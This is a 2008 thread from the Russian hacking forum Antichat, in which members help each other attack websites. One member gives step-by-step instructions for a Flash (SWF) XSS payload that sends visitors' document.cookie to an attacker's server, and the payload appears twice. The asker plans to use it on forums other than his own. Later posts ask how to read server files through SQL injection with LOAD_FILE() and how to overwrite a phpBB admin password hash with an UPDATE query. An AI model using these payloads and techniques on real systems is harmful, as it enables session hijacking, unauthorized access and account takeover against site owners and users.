ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.05.2008, 18:13
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме:
163552
Репутация:
1
|
|
И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??
Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
|
|
|
30.05.2008, 18:15
|
|
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме:
447871
Репутация:
208
|
|
да, это ActionScript- язык сценариев, иcпользуемый в Flash
|
|
|
|
30.05.2008, 18:21
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
SeeJay
Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:
Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
строку: "javascript :код". У тебя должна получится всего одна строка следующего содержания:
getURL("javascript:alert('Flash XSS!')");
в твоем случае это:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:
<object>
<embed src="ФЛЕШКА.swf" type="application/x-shockwave-flash" />
</object>
поидее должно работать) главное не падай в минуса..
Последний раз редактировалось sabe; 30.05.2008 в 18:28..
|
|
|
|
30.05.2008, 18:32
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме:
163552
Репутация:
1
|
|
Сообщение от sabe
SeeJay
Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:
Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
строку: "javascript:код". У тебя должна получится всего одна строка следующего содержания:
в твоем случае это:
Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:
поидее должно работать) главное не падай в минуса..
Спасибо буду пробовать!
|
|
|
|
30.05.2008, 19:09
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208
Репутация:
21
|
|
Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.
|
|
|
|
30.05.2008, 19:13
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Spaise
Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.
Что за бред, ты юзаешь скрипт на локалхосте и не можешь подобрать путь?
|
|
|
|
30.05.2008, 19:16
|
|
Познающий
Регистрация: 20.05.2008
Сообщений: 42
Провел на форуме:
260433
Репутация:
5
|
|
Народ,почему все статьи о взломах есть,кроме php inj??
ПРосьба написать
|
|
|
|
30.05.2008, 19:29
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
|
|
|
|
30.05.2008, 19:37
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме:
163552
Репутация:
1
|
|
Сообщение от SeeJay
Спасибо буду пробовать!
Дааааааа…
Форум то мой пропатчен от и до!
Буду пробовать через другие залезать!
Буду, благодарен совету!
С уважением и благодарностью SeeJay!
|
|
|
|
30.05.2008, 21:08
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706
Репутация:
310
|
|
как обновить в селект запросе данные в БД?
UPDATE phpbb_users set user_password=81dc9bdb52d04dc20036dbd8313ed055 where username=admin
как это использовать? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [:|||||:]](/avatars/avatar57317.jpg?710641){kind=avatar}
![Отправить сообщение для [:|||||:] с помощью ICQ](fusion/misc/im_icq.gif)
![Отправить сообщение для [:|||||:] с помощью AIM](fusion/misc/im_aim.gif)
![Отправить сообщение для [:|||||:] с помощью MSN](fusion/misc/im_msn.gif)
![Отправить сообщение для [:|||||:] с помощью Yahoo](fusion/misc/im_yahoo.gif)
Похожие темы
Линейный вид
